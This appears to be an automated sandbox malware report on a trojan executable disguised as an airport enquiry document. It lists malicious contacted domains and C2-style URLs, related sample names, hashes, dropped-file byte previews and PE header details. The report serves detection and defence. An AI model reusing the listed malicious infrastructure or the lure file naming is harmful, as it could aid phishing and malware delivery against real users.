          • Avira URL Cloud: safe
          		unknown
          http://www.strategiclogisticsagency.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.dreziuy.xyz/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          103.224.212.214
          		www.serverdayz.comAustralia
          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
          76.223.105.230
          		wheresthechocolateat.comUnited States
          		16509AMAZON-02UStrue
          104.18.23.89
          		sites.ludicrous.cloudUnited States
          		13335CLOUDFLARENETUStrue
          104.18.24.121
          		www.arlatwestern.shopUnited States
          		13335CLOUDFLARENETUStrue
          103.235.46.96
          		www.wshifen.comHong Kong
          		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1499643
          Start date and time:2024-08-27 10:50:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:10
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/4@14/5
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 54
          • Number of non-executed functions: 271
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          04:51:39API Interceptor8479563x Sleep call for process: explorer.exe modified
          04:51:43API Interceptor8175348x Sleep call for process: msiexec.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          103.224.212.214http://costpointfoundations.coGet hashmaliciousUnknownBrowse
          • costpointfoundations.co/
          Dekont.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.grupocontigoalimentacion.com/by21/?JdvdYDix=Qiv85XpES+gRGKgJ50il+ut781DP8c9dVMkrfMMJcjn4yfiAOg7zefoq3f+ee4p+KYz+&od30z4=R2Mpk
          MCS61094Y5OI8.exeGet hashmaliciousFormBookBrowse
          • www.grupocontigoalimentacion.com/de94/
          swift copy.exeGet hashmaliciousFormBookBrowse
          • www.serverdayz.com/pt46/?U48h=HjOp3dG8ifjxtzc0&uVgT=ssXGlCLLWL5Hbp+Kj8TEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP82t2g6UvoDvBo1oONQ==
          file.exeGet hashmaliciousCMSBruteBrowse
          • bvhrk.com/admin/
          Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
          • www.52cg2.club/dn03/?mH=vHL/aMkFAwjyVl2Dd70lT+aSSGnTactS6ZKo1NCGbcutKIwEuoKoLmdigK9d5B6ACqxl&blMXi=UTIlCLfpPh9tBHY
          MCdhfoPPYvL8Y64.exeGet hashmaliciousFormBookBrowse
          • www.meet-friends.online/he2a/?Cp=j259IZkOpjupuBTwOx4nur4drEuXVGOqNWoRJeFFuPyRSmHo6WYXCK9hp6SFyqQ991E4&Jr=X0DTzv-h_xKdGL
          Here.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.meet-friends.online/he2a/?u4Wt=j259IZkOpjupuBTwOx4nur4drEuXVGOqNWoRJeFFuPyRSmHo6WYXCK9hp6SFyqQ991E4&K6A=wDHTzXb0
          Confirm PDF.exeGet hashmaliciousFormBookBrowse
          • www.meet-friends.online/he2a/?Bz=j259IZkOpjupuBTwOx4nur4drEuXVGOqNWoRJeFFuPyRSmHo6WYXCK9hp6SFyqQ991E4&r6=GbtltDz0Q
          jYLXwtSJOP.exeGet hashmaliciousFormBookBrowse
          • www.ioherstrulybeauty.com/gy14/?_nuDR=Zf34QfZHJB&lJExfNm=iq2f6ui2wqz8xuu1H6vWkOMFNAwMJfBPtqur0GdwnWxRQ4p6OEO0KyV2U30Bz8sjBJTk
          76.223.105.230http://bttr-llc.comGet hashmaliciousUnknownBrowse
          • bttr-llc.com/
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.7774.12516.rtfGet hashmaliciousFormBookBrowse
          • www.arelenegrace.com/hy08/?sFN=oPXpsLvH0pVLVT&1bcxg=IYpvE9p1LWgE3s0pNpuzAf1nXS15w7Vq8L77BFaKzXcLByeNx9OHblKH7UbQs7lOVp0rYQ==
          RFQ REF-JTC AJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
          • www.wheresthechocolateat.com/pt46/?EjAXLd=jBZTV&K48T=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9UBb26G4LX53orEZw==
          FBOZtotG0B.exeGet hashmaliciousFormBookBrowse
          • www.jrdautomotivellc.com/pnug/?2dspOd=Xl1gPlBY3RHMyhNDLOHIkFCqR4PNn0Ln+VsrtMDt628JcBt6wu0xnCUa+xC78gA8dlQUOFjwJA==&PtFXdv=0bm08L4Xy8mLXZx0
          Official Salary for the Month of August 2024 - NU1622662404290592.exeGet hashmaliciousFormBookBrowse
          • www.wheresthechocolateat.com/pt46/?Cj90E=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&GVWh=CdT0vvb
          http://polymerworks.co.ukGet hashmaliciousUnknownBrowse
          • polymerworks.co.uk/
          PR_Form_20240809_145815.bat.exeGet hashmaliciousFormBookBrowse
          • www.owpg.online/sy52/?ADKX=yjHcTNYZscCf7X7V3KS4QhDaw7WbFxQca0sdsOF3MVS1i6Qt+iXycYNUHWSrI6jiObK7&Vlcty=6lbtP8lPtnPPOfb0
          http://theweber.groupGet hashmaliciousHTMLPhisherBrowse
          • theweber.group/
          Exv453QQIX.exeGet hashmaliciousFormBookBrowse
          • www.document-help.com/04u1/
          SOA IN JUNE USD90865.00.exeGet hashmaliciousFormBookBrowse
          • www.virtualeventsbyelaine.com/na10/?vx=Y15dvrdaP4BlnoUd0B0CUee9qRi1uposW0sjk5H0yZZdbyRLK6GrCxCe6TbO6TsThJlW&Sj=BpFt

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          www.arlatwestern.shopTicket Receipt and Fine.exeGet hashmaliciousFormBookBrowse
          • 104.18.24.121
          www.wshifen.com3621103789.exeGet hashmaliciousUnknownBrowse
          • 103.235.46.96
          https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw==Get hashmaliciousUnknownBrowse
          • 103.235.47.188
          S8faD2qee3.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
          • 103.235.47.188
          S8faD2qee3.exeGet hashmaliciousPureLog StealerBrowse
          • 103.235.46.96
          https://m.163.com/Get hashmaliciousUnknownBrowse
          • 103.235.47.188
          https://t0kenp0cket.com/zh/download/app/Get hashmaliciousUnknownBrowse
          • 103.235.47.188
          4.exeGet hashmaliciousBlackMoonBrowse
          • 103.235.46.96
          2.exeGet hashmaliciousBlackMoonBrowse
          • 103.235.47.188
          1.exeGet hashmaliciousBlackMoonBrowse
          • 103.235.46.96
          3.exeGet hashmaliciousBlackMoon, XRedBrowse
          • 103.235.46.96
          sites.ludicrous.cloudSecuriteInfo.com.Win32.RATX-gen.24742.674.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 104.18.35.90
          CSCEC Middle East (L.L.C).exeGet hashmaliciousFormBookBrowse
          • 104.18.35.90
          IIMG_00172424.exeGet hashmaliciousFormBookBrowse
          • 104.18.35.90
          SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exeGet hashmaliciousFormBookBrowse
          • 104.18.35.90
          Shipping Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 172.64.152.166
          SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 104.18.35.90
          http://track.fsome.us/?xtl=1viwu5za3qfkgb4bktigd6w9r2aiqj8ubi9x5aevx7vsdxmw96lm51d09tvturwitx5wwhlphpachqeuw68ny1p2uhpiqa5szmrev8&eih=pq9mx5ijy0kxtkev624h50srg6ww83cce1e&__stmp=sgg9ci&__onlt=hGet hashmaliciousUnknownBrowse
          • 104.18.35.90
          IMG_00110724.exeGet hashmaliciousFormBookBrowse
          • 104.18.35.90
          SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
          • 104.18.35.90
          Shipping Documents.exeGet hashmaliciousFormBookBrowse
          • 172.64.152.166
          www.serverdayz.comswift copy.exeGet hashmaliciousFormBookBrowse
          • 103.224.212.214

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUShttp://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
          • 141.101.120.10
          virus total.pdfGet hashmaliciousHTMLPhisherBrowse
          • 188.114.97.3
          ung_9191.pdfGet hashmaliciousUnknownBrowse
          • 104.18.3.35
          Request for Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          Feature Status Update WDWRN.htmlGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
          • 188.114.96.3
          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
          • 104.26.6.127
          TRELLIAN-AS-APTrellianPtyLimitedAU031215-Revised-01.exeGet hashmaliciousFormBookBrowse
          • 103.224.182.242
          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
          • 103.224.182.242
          Quote 1T PN40 082624.exeGet hashmaliciousFormBookBrowse
          • 103.224.182.242
          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
          • 103.224.182.252
          roundwood.exeGet hashmaliciousSimda StealerBrowse
          • 103.224.182.252
          Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
          • 103.224.182.242
          Request for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
          • 103.224.182.242
          RFQ-230802024.PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 103.224.182.242
          Document 21824RXVPO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 103.224.182.242
          AxgZVzUv8m.exeGet hashmaliciousPonyBrowse
          • 103.224.212.212
          CLOUDFLARENETUShttp://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
          • 141.101.120.10
          virus total.pdfGet hashmaliciousHTMLPhisherBrowse
          • 188.114.97.3
          ung_9191.pdfGet hashmaliciousUnknownBrowse
          • 104.18.3.35
          Request for Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          Feature Status Update WDWRN.htmlGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
          • 188.114.96.3
          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
          • 104.26.6.127
          AMAZON-02UShttp://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
          • 3.122.190.9
          https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
          • 3.70.10.198
          Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
          • 13.248.169.48
          Payment Details Swift copy.exeGet hashmaliciousFormBookBrowse
          • 76.223.67.189
          INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
          • 13.248.169.48
          #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 76.223.54.146
          LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
          • 18.228.165.84
          OmnibeesReservas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
          • 18.228.165.84
          https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
          • 52.217.205.32
          LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
          • 18.228.165.84

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Temp\aut39CA.tmp

          Download File
          Process:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type:data
          Category:dropped
          Size (bytes):177486
          Entropy (8bit):7.968612513184063
          Encrypted:false
          SSDEEP:3072:Vb/kQrnoFASlCrp5hTARvFTz1qvrvfMl7qnvCxAKY+ggKY8bzAXodzlOnB:Vb542FCGnE7qnvOAKYFgKrSTB
          MD5:4BE5734C5BC9C6D3EDAC4E8086D8661C
          SHA1:E64E72CDDE760FDBBF8549EF1B97C7F599F73FF4
          SHA-256:CB979460AC541DD55534CDD75B099A72A92D6C5A2CB33AD0350E6FF512AEE259
          SHA-512:80BAA4A6DC06E94ED215DA0803EE8468DBEABF650530EE5D07B88D633EECBABFC5B6FCE51B6DF2D02960DC893791DA6B7DD736445F68F91C817F1F5CC76CD6AD
          Malicious:false
          Reputation:low
          Preview:EA06.......Q.-".D.....g;...Yy..v'....(z.'VqM.Vh..h..3...P..... W(...7.H..t..".l...Vy..O&.K....WV.I.2YM.u4.[.R[...k....9M..L.Z..3...........K}z..{..@..w3... ......#..D.......Q.=2.I.Q(......Z.E..D.PjT\....*UJ.U. 54P...D.....<.W...*T..........=...Vj..m`.A.. `.@...}@........L@..."..A..$..`....g.....0.C..............?....p............&.w$..f..G./U....}......;4C#.Q"..l6/..Ep..z...(_.'...q..tv...l.T...[..kh.N.....~..|....Vq..E.I..N)|.@.....5+...q.<.e..sc.^6...Qq:.dfy..S).j..SM..6..%?.q4|}...H.g.x......(.W1..qb...6e?.q1...f....yY.wb...vyN.F...V91.6.%]..g..F.....4.wH....u...g...i....9...u.Z.7....5.}.N....g5N.8.....4:Og9...{P...)..U8..gj;@...@.n3SI..g...+...l...73...dt...I?.f:Yln...q<X..W.h.d.T.>s...Dwq:.6+:..Q.~W.c.L.y*.K........b..MxQJ.2.E...|zg.!@.].}.%7g..B..X.......{g...p..........{a...5.T'....b..Ln..m8.....;.A);;...o'4=L.c..t..^.....[xw.a.z..n.v]..E......(..z.x.l.A.V8Z......F&...v#..sp3....Z.@8...b.K.F..X..A.D..h.v......N5.g.Sm..>....,.

          C:\Users\user\AppData\Local\Temp\aut39FA.tmp

          Download File
          Process:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type:data
          Category:dropped
          Size (bytes):17282
          Entropy (8bit):7.866687746537832
          Encrypted:false
          SSDEEP:384:nYxDxKQgavxWEGd/HqwZgcjMfI0lly5W/nVxhrPdBrROF:YVv/+HhjMDaW/V7bROF
          MD5:7B522584E4C7DB09E2A87721052645E8
          SHA1:12C1B3E96939AD716168161009874FD1A44DA410
          SHA-256:23267CA907D99A86809B8288A20A1901FD5EBDC5E05BD9BAE4DC1B93DA0BBE4B
          SHA-512:605C09054A924CA2501926C31BCDF2A5771591CC68B7BF59B0FED1F05241DDDC34549022BD45C413B8A11DA29D86DE55BC50EFA11346539EEDD3C440666C0D1F
          Malicious:false
          Reputation:low
          Preview:EA06...!.`3.<...........`4..g....r.<....p.7..S..Z.|-E....jx.....@..xZ0..C...\\..'i.F,.......7..~...E...8[..H.J...|..m...;.._..\.g.|X...J..m......(....Z.......X..P.+@....,........g5.`..r....U..3...@..-@.?.....8ZN..i..1-v..S...j.[......t .y.....-\-..K...\<O.....8y.^p.k ..E.....8[.._...5.P.8.`7 D[.456..<...F@#...k@.8..@.@...\...{.@.....!.Y8[.........m ..V......j,.#.7.t...............np.........-........p..9Wul...|.A..+.....{7.w..................Y..E.....k...8......X .`.....p.@H_h.....8x@......_.Z4......4...cL..Q....}.-.. ...4...=....d.....=..D.....+....@.~@......j..~@U......~]e..|...x..H.O.....D....W..s.D...O......@v@.O..3.........n....@ ...p..... .....v....\<.....\.0....Y.....R...g?.....2`...e...P....g...O;.......8_X.:..P7.....l@...+d............. G2`....h....`..#[m.k..`..)....A....%b..V. .FR.._Z.......3..`r........0@ .7.........~P.....B..k...`.p..]........p.[....<7P........l@....L.*n...<\.Q.. ..X.j.......y.g.Wg.#2.......Rg/....8X.. ....2`.....1 .`!

          C:\Users\user\AppData\Local\Temp\spiketop

          Download File
          Process:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type:International EBCDIC text, with very long lines (57121), with no line terminators
          Category:dropped
          Size (bytes):57121
          Entropy (8bit):4.975182112181778
          Encrypted:false
          SSDEEP:768:4anY1tcSOCa+j4FvOU1xQIh7GZbfGH0e9Ad0l:UPzOy+OUzIZbfGvl
          MD5:79B6F047E29CBEEC870695936784CC83
          SHA1:8BA9B8476E9DE9B036856C0E7B9381789183FC56
          SHA-256:E2A5BEA85DC72CE6A91A9A1E7833ABC75EC914B10618FB427D6DDB6B8A715B2D
          SHA-512:455028DAA15BC532CDE2B32B93BEE11475956C91CF9A6C9A492018D2C97D29E57C04B890B8C483DA2C1D930EA641DD57D35D90D60AC52B719FB396146ABE16FC
          Malicious:false
          Reputation:low
          Preview:..jj..........b..}..jk.i.....ee.b.....ij.f.....ee.b.....i..h.....ee.b.....jj.j.....ee.b.....ij.......ee.b.....i........ee.b.....jj.......ee.b.....ij.b.....ee.b.....i..d.....ee.b.....jj.f.....ee.b.....ij.h.....ee.b.....i..j.....ee.b.....jj.......km.f.....k..b..}..km.j..............ee.b.....nj.h........h..}..ee.h.....m........k..b..}..km.j..............ee.b.....nj..........d..}..ee.h..............ki.b..}..km.j..}...........ee.b.....nj.d........h..}..ee.h.....i.........n.h.....k........lj.b..}..km.g..}..lh.b..}..km.f.

          C:\Users\user\AppData\Local\Temp\wainage

          Download File
          Process:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type:data
          Category:dropped
          Size (bytes):189440
          Entropy (8bit):7.822314845763124
          Encrypted:false
          SSDEEP:3072:azsrW1HrukemVwHyQLrOHj7pyxPGC4j8bV36lgOpTS3EOtlQwHKppi11T4CNItia:azdBrtKk7iG54V3y3+Rt6tH8NDrr8Q3A
          MD5:B54BFF163AD5835BBD403A4EC6B2FCA2
          SHA1:C7D3171F55C5597973132B0090F29846B545EAC7
          SHA-256:6F3F3C747A7C4993A772E610CEF4D73989562BFA4C418C4DE84602C3DEA21709
          SHA-512:C55576A812790A4BDD3B14C6097228AA14185068F9641F0FC4C77DD11D287BD7AF60E099E0F4AB618336A94DF15F392577BFD6A66CB12F68E8E6D55641D535C0
          Malicious:false
          Reputation:low
          Preview:.....HADOk.L...e.LN..g0C...8MRYGLMHADO3KREE8MRYGLMHADO3KR.E8M\F.BM.H.n.J..dl%;*g<?'&6.^k1$+V"&y%)m:4*oZ%r..km?6#)cELNk3KREE8M..O...'...-..^..Y....'..3...^..Y....'..Z(:..^.RYGLMHADO3KREE8M..GL.I@DE.tnEE8MRYGL.HCED2ARE.:MRYGLMHADO.JREU8MR.ELMH.DO#KREG8MWYFLMHADJ3JREE8MR.ELMJADO3KRGEx.RYWLMXADO3[REU8MRYGL]HADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADaG.*1E8M6.ELMXADO.IREU8MRYGLMHADO3KReE8-RYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHADO3KREE8MRYGLMHAD

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.057895235347342
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File size:1'120'768 bytes
          MD5:621c253a4d715e3af16fe8be2fdd8cb1
          SHA1:68ce09cc59887c7f9649f22e6688028957d6c55e
          SHA256:007c997b49ac0889e71757762c82432a975a273eda4c871acec3c0823c6ea530
          SHA512:56616c4175b53f6b00591e7aa5d32146fb168de7a22501c9fd784a0ccc5d403b5b920f01f3545cceab9ea0dd0cc5df992d339bed6a838e930094f35782bc4fa6
          SSDEEP:24576:TAHnh+eWsN3skA4RV1Hom2KXMmHaIxs0ZkXe9VHdA5:eh+ZkldoPK8YaIxIe9O
          TLSH:3935AD0273D2C036FFAB92739B6AF24556BC79254123852F13981DB9BD701B2227E763
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

          File Icon

          Icon Hash:aaf3e3e3938382a0

          Static PE Info

          General

          Entrypoint:0x42800a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
          Time Stamp:0x66CD4725 [Tue Aug 27 03:25:25 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:afcdf79be1557326c854b6e20cb900a7

          Entrypoint Preview

          Instruction
          call 00007FE89480E5ADh
          jmp 00007FE894801364h
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push edi
          push esi
          mov esi, dword ptr [esp+10h]
          mov ecx, dword ptr [esp+14h]
          mov edi, dword ptr [esp+0Ch]
          mov eax, ecx
          mov edx, ecx
          add eax, esi
          cmp edi, esi
          jbe 00007FE8948014EAh
          cmp edi, eax
          jc 00007FE89480184Eh
          bt dword ptr [004C41FCh], 01h
          jnc 00007FE8948014E9h
          rep movsb
          jmp 00007FE8948017FCh
          cmp ecx, 00000080h
          jc 00007FE8948016B4h
          mov eax, edi
          xor eax, esi
          test eax, 0000000Fh
          jne 00007FE8948014F0h
          bt dword ptr [004BF324h], 01h
          jc 00007FE8948019C0h
          bt dword ptr [004C41FCh], 00000000h
          jnc 00007FE89480168Dh
          test edi, 00000003h
          jne 00007FE89480169Eh
          test esi, 00000003h
          jne 00007FE89480167Dh
          bt edi, 02h
          jnc 00007FE8948014EFh
          mov eax, dword ptr [esi]
          sub ecx, 04h
          lea esi, dword ptr [esi+04h]
          mov dword ptr [edi], eax
          lea edi, dword ptr [edi+04h]
          bt edi, 03h
          jnc 00007FE8948014F3h
          movq xmm1, qword ptr [esi]
          sub ecx, 08h
          lea esi, dword ptr [esi+08h]
          movq qword ptr [edi], xmm1
          lea edi, dword ptr [edi+08h]
          test esi, 00000007h
          je 00007FE894801545h
          bt esi, 03h

          Rich Headers

          Programming Language:
          • [ASM] VS2013 build 21005
          • [ C ] VS2013 build 21005
          • [C++] VS2013 build 21005
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
          • [ASM] VS2013 UPD5 build 40629
          • [RES] VS2013 build 21005
          • [LNK] VS2013 UPD5 build 40629

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x47238.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000x7134.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

